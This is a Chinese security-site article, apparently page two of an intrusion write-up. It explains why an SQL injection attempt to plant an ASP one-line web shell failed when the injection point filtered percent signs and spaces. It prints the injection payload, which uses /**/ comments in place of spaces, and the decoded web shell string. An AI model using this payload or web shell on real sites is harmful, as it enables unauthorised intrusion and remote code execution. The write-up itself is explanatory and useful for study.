您的位置:首页 >>网安文摘 >>入侵实例 >> 文章内容

一次有趣的SQL注入攻击

Google
 
[ 信息来源:黑白网络 ] [ 发布时间:2007-03-23 ]


通过检索发现问题:

表cmd中的内容为:0x3C457865637574652872657175657374282276616C75652229293E
表shit_tmp内容为:0x3C25657865637574652872657175657374282276616C7565222929253E

这些都是十六进制数,解释成字符就是<Execute(request("value"))>和<%Execute(request("value"))%>
这样就真相大明了,因为这个注入点过滤了%和空格所以在提交:user_id=1996';insert/**/into/**/cmd/**/(a)/**/values/**/('<%Execute(request("value"))%>')-- 时%号被过滤,实际上相当于提交了:user_id=1996';insert/**/into/**/cmd/**/(a)/**/values/**/('<Execute(request("value"))>')--这样导出的ASP文件当然不能用了。
  不过还有些不明白的地方,为什么执行了一句插入语句,数据表却出现四条相同的记录呢?按道理讲不通呀!应该是执行一句只添加一条记录才对,这个问题还是留给聪明的读者您来思考吧!最后提醒各位网络爱好者非法入侵电脑系统,恶意破坏计算机网络是违法的事情,除非绝对必要请不要修改人家计算机上的任何文件,以免给自己带来不必要的麻烦。

你复制的文字来自西部网安


共2页: 上一页 [1] 2 下一页

声明:西部网安刊登此文章是为了传递更多信息,文章内容仅供参考,转载请注明出处。   
 
    ·在线评论

评论列表

用户名: 新注册) 密码: 匿名评论

赞助展示链接
精彩图片
赛车版无间道 极品飞车12真人游戏截图 赛车版无间道 极品飞车12真人游
第十二代《极品飞车:卧底》(Need for Speed Undercover)是EA Black B
奥林巴斯E-520样张:美女花木衣世 奥林巴斯E-520样张:美女花木衣
奥林巴斯E-520是一款外形小巧、携带方便的数码单反相机,更是一款非常
全球最轻播放器之一 Cube D7美女图赏 全球最轻播放器之一 Cube D7美女
DCube D7十分小巧,其三围是59.53311mm ,重25克。受制机身的限制,D7
黑丝袜的诱惑 性感美女演绎台电T50+ 黑丝袜的诱惑 性感美女演绎台电T
台电T50+在前作的基础上加入了TV-OUT电视输出功能,采用WQVGA多点触摸
周杰伦大名远洋 成中国入选W3C规范第一人 周杰伦大名远洋 成中国入选W3C规
2008年8月29日,W3C的Web IDL工作草案正式发布,令人惊奇的是在规范说

版权所有 西部网安 Copyright(C) 2005-2008 All Rights Reserved.陕ICP备05009754号